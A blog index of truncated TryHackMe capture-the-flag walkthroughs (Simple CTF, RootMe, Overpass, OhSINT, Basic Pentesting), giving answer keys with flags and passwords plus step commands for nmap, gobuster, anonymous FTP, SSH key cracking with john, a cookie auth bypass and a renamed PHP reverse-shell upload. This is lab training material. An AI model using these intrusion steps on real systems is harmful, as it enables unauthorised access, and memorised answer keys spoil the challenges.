Posts

Showing posts from January, 2023

Simple CTF - TryHackMe Problem Solving

1. How many services are running under port 1000? Ans: 2
2. What is running on the higher port? Ans: ssh
3. What's the CVE you're using against the application? Ans: CVE-2019-9053
4. To what kind of vulnerability is the application vulnerable? Ans: sqli
5. What's the password? Ans: secret
6. Where can you login with the details obtained? Ans: ssh
7. What's the user flag? Ans: G00d j0b, keep up!
8. Is there any other user in the home directory? What's its name? Ans: sunbath
9. What can you leverage to spawn a privileged shell? Ans: vim
10. What's the root flag? Ans: W3ll d0n3. You made it!

================== Problem Solving Steps ==================

1. First of all, start openvpn.
2. Scan with nmap:
   cmd: nmap -A ip address
   cmd: ftp ip address
   cmd: anonymous
   cmd: ls
   cmd: cd pub
   cmd: ls
   cmd: mget *
   then: y
   cmd: bye
   cmd: less ForMitch.txt
   cmd: gobuster dir -u http://ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
   to get the directory "simple"
3. Go to browser...

RootMe - TryHackMe Problem Solving

1. Scan the machine, how many ports are open? Ans: 2
2. What version of Apache is running? Ans: 2.4.29
3. What service is running on port 22? Ans: ssh
4. What is the hidden directory? Ans: /panel/
5. user.txt Ans: THM{y0u_g0t_a_sh3ll}
6. Search for files with SUID permission, which file is weird? Ans: /usr/bin/python
7. root.txt Ans: THM{pr1v1l3g3_3sc4l4t10n}

============

1. Start openvpn and open the IP address in the browser.
2. Scan:
   cmd: nmap -sV -sC ip address
   to get the ports and the Apache version
   cmd: gobuster dir -u http://ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
   to get the hidden directory list
3. Go to Google, search for "php shell pentestmonkey" and download the file "php-reverse-shell.php", then change the file extension, like "php-reverse-shell.php5".
4. Open "php-reverse-shell.p...

Overpass - TryHackMe Problem Solving

1. Hack the machine and get the flag in user.txt Ans: thm{65c1aaf000506e56996822c6281e6bf7}
2. Escalate your privileges and get the flag in root.txt Ans: thm{7f336f8c359dbac18d54fdd64ea753bb}

============= Solving way =============

1. First of all, start the machine, copy the IP address and paste it into the browser.
2. Open a terminal and run:
   cmd: nmap -A -sS -sV -T4 ip address
   for open ports, etc.
3. Go to the browser, visit the site at the IP address and view the source code.
   cmd: gobuster dir -u http://ip --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
   for directory info like "admin,img"
4. Go to the ip/admin page and try to log in, then "inspect" and view the page source.
   Add Cookie "SessionToken" => "empty"
5. Reload the browser and get the hash key.
   cmd: nano id_rsa
   cmd: ls
   cmd: chmod 600 id_rsa
   cmd: ssh2john id_rsa > hash.txt
   cmd: john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
   Get password: james13
   cmd: ssh -i id_rsa james@ip
   For login need Input- ...

OhSINT - Problem Solving for TryHackMe

1. What is this users avatar of? Ans: cat
2. What city is this person in? Ans: London
3. Whats the SSID of the WAP he connected to? Ans: UnileverWiFi
4. What is his personal email address? Ans: OWoodflint@gmail.com
5. What site did you find his email address on? Ans: Github
6. Where has he gone on holiday? Ans: New York
7. What is this persons password? Ans: pennYDr0pper.!

============= Solving way ============

1. First of all, download the jpg file from TryHackMe, then open a terminal and write:
   cmd: exiftool file_name.jpg
2. Get the user name, then search for it on Google.
3. You will see some website links; open the GitHub, Twitter and website links.
4. Use Twitter to get the user's "name" and SSID.
5. Use GitHub to get the location and email.
6. Use the website to get the "Where has he gone on holiday?" address and the password (View Source).
7. Go to "wigle . net" and paste the SSID to get the "Name" of the WAP he connected to.

How to Save a File in Nano ?

Step 1st: Create the file: cmd (terminal): nano "file name", then hit ENTER
Step 2nd: Write your code in any language.
Step 3rd: Press CTRL + O to save the file, type the file name, and hit ENTER
Step 4th: To exit nano, all you need to do is press CTRL + X

Basic Pentesting – TryHackMe

1. What is the name of the hidden directory on the web server(enter name without /)? Ans: development
2. What is the username? Ans: jan
3. What is the password? Ans: armando
4. What service do you use to access the server(answer in abbreviation in all caps)? Ans: ssh
5. What is the name of the other user you found(all lower case)? Ans: kay
6. What is the final password you obtain? Ans: heresareallystrongpasswordthatfollowsthepasswordpolicy$$

===========================

1st → Start the machine and run openvpn. Command (in dir): sudo openvpn file.ovpn
2nd → Open the IP address in the browser and view the source code.
3rd → Run the command: nmap -sC -sV -oN initial IP Address
      to find the open ports, like “22,80,145”
4th → Command: gobuster dir --url http://Ip --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
5th → Copy ip/dir and open it in the browser.
6th → cmd: enum4linux -a ip address
      to find out the user name...